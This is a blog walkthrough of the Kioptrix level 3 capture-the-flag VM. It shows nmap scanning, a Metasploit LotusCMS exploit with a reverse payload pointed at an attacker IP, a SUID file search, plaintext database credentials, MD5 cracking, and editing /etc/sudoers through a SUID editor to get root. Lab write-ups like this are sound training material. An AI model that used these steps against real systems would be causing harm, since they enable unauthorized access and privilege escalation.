[Hacking series] – Kioptrix level 3

Written by  on June 8, 2015 

Code name: Kioptrix3

Webpage: http://kioptrix.com/

VM Download: www.kioptrix.com/dlvm/KVM3.rar

Challange: Get root on the system

First of all, let’s see wich ports are open.

# nmap -p- -Pn -A 192.168.11.11

1

Port 80 open, as usual, let’s browse it

2

Ligoat? Uhm, we can dig a litle deeper.

3

jackpot! So LotusCMS huh..

We can search that on some exploit databases such as metasploit or the exploit db to see if we can find something useful.

# msfconsole

msf > search lotus

4

Exploit found? Lets try this one

msf > set RHOST 192.168.11.11

msf > set URI /

5

We can also set the payload and edit it’s options

msf > set LHOST 192.168.11.7

msf > set LPORT 8723

6

And then just run the exploit

msf > exploit

7

Now we are in, but our shell is not privileged, we must try to find a way to escalate our privileges on the system. One way to do that is to find some special files that can always be run as the (user)owner, the (group)owner or the (directory)owner. We can perform a search to look for files that are always executed as the user owner with:

$ find / -perm -u=s -type f 2>/dev/null

10

And we found an interesting one, /usr/local/bin/ht

But if we try to open it from our shell…

errr

Damn, we will need a full interective shell for that. ssh will do the job, but we need to find a valid user and it’s password… we need to dig deeper in the system.

11

After a quick research, we found that on the web public directory. As the webapp works with php-mysql, we can find the mysql db admin password stored in plain text inside the webapp configuration file!

12

Nice! Now we can try to log in with these credentials, we can log into phpmyadmin as we found it using nikto

pma

After looking inside the database’s tables, we found 2 interesting entries

13

Looks like passwords are stored using md5, we can decrypt it using some public md5 hash database

14

Password found, now we can login via ssh

15

We are in, now that we got a full interactive shell, we can go back and execute ht

16

Let’s see

17

Looks like a text editor, as we are running it with root privileges, we can try to open or edit some interesting file. 2 interesting files can be /etc/sudoers and /etc/shadow

19

After opening the file, we can edit it.

18

I’ve edited /etc/sudoers and granted all privileges on the user loneferret. Now we can just run

# sudo su

And get root

21

Game over kioptrix3 P-)

Category : hacking series

Leave a Reply

Your email address will not be published. Required fields are marked *